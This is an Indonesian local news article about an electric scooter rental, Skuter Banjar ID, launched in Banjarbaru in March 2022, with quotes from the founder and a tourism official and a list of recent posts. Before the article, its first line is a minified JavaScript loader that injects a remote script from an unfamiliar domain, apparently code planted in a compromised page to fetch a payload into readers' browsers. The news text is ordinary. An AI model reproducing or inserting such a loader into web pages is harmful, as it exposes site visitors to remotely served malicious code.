(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Skuter Listrik Hadir di Banjarbaru, Dongkrak Wisata di Pusat Kota


KANALKALIMANTAN.COM, BANJARBARU – Daya tarik Kota Banjarbaru yang telah menyandang status ibu kota Provinsi Kalimantan Selatan semakin didukung dengan perkembangan wahana wisata.

Salah satunya yang terbaru ialah hadirnya jasa penyewaan skuter listrik yang terpusat di kawasan jantung perkotaan, tepatnya di lapangan dr Murdjani.

Unit-unit ini dikelola secara langsung oleh Skuter Banjar ID. Wahana ini secara resmi dioperasionalkan oleh Wali Kota Banjarbaru diwakili Kepala Dinas Pemuda Olahraga Kebudayaan dan Pariwisata (Disporabudpar) Banjarbaru, Ahmad Yani Makkie, dalam acara Grand Opening Skuter Banjar ID di rumah makan Tudung Saji, Jumat (25/3/2022) sore.

Untuk saat ini Skuter Banjar ID menyediakan sedikitnya 15 unit skuter listrik yang dapat disewa para pengunjung melalui sistem booking. Untuk tarif yang dikenakan cukup terjangkau yakni seharga Rp35 ribu dengan durasi pemakaian selama 20 menit. Bahkan dengan tarif tersebut pengunjung juga sudah mendapatkan fasilitas berupa swafoto.

 

Baca juga  : 165 Guru Honorer Lulus PPPK di HSU Mulai Tanda Tangan Kontrak Kerja

Maulana AHS, Founder Skuter Banjar ID, mengungkapkan munculnya ide penyewaan skuter listrik ini didasari atas minimnya sumber daya alam. Menurutnya, Kota Banjarbaru saat ini hanya terpatok pada sumber daya manusia dan teknologi saja.

“Disini kami mencoba membangkitkan sumber daya wisata di Banjarbaru. Caranya dengan menyediakan wahana yang mampu menopang sektor wisata kita dan saya rasa yakin skuter listrik ini. Akhirnya kami eksekusi,” katanya.

Selain itu, Maulana juga mengungkapkan animo penyewa skuter listrik di Banjarbaru cukup tinggi. Hal itu ujarnya dibuktikan dengan jumlah akumulasi pengunjung selama pra launching wahana beberapa waktu lalu.

“Selama pra launching kami mencatat kurang lebih total 2.000 customer yang kami layani. Disini kami meyakini masyarakat menikmati dan enjoy bermain skuter listrik. Rencananya akhir bulan ini kami akan menambah 30 unit skuter listrik untuk disewakan,” bebernya.

 

Baca juga  : RAPI 04 Kapuas Siap Gelar Muswil, Ini Kata Kadiskominfo Kapuas

Disisi lain, Kepala Disporabudpar Banjarbaru Ahmad Yani Makkie, menyambut gembira atas hadirnya wahana wisata skuter listrik. Mengingat Banjarbaru yang kini menyandang status Ibu Kota Provinsi Kalimantan Selatan, ia meyakini bisnis ini mampu mendongkrak kunjungan wisatawan.

“Pemindahan ibu kota Provinsi Kalsel ke kota Banjarbaru memantik semakin banyaknya kegiatan pariwisata dan destinasi wisata yang akan kita kembangkan dan semakin terbuka lebar. Salah satunya Skuter Banjar ID Ini yang saya harapkan dapat menjadi nilai tambah destinasi wisata di Kota Banjarbaru,” katanya.

Tak lupa, Yani Makkie juga berharap bisnis yang dikelola Skuter Banjar ID mampu menyajikan daya tarif positif di kalangan masyarakat. Dengan begitu pula katanya sektor ekonomi daerah juga akan terus meningkat.

“Semoga Skuter Banjar ID ini kedepannya sukses dan selalu menyajikan daya tarik yang positif. Karena bertambahnya daya tarik suatu kota, tentu secara tidak langsung dapat meningkatkan sektor ekonomi daerah. Teruslah berkreasi secara positif. If you are positif, you’ll see opportunities instead of obstacles,” tuntasnya.

Skuter Banjar ID membuka jasa penyewaan setiap hari dari pukul 15.00 Wita – 22.00 Wita dan terkhusus hari Minggu ini dibuka sejak pagi. Wahana ini berlokasi di Rumah Makan Tudung Saji dan dapat dipesan melalui kontak Whatsapp 081313515171. (Kanalkalimantan.com/al)

Reporter : al
Editor : bie


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

10 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

10 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

10 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

10 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

11 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

11 jam ago

This website uses cookies.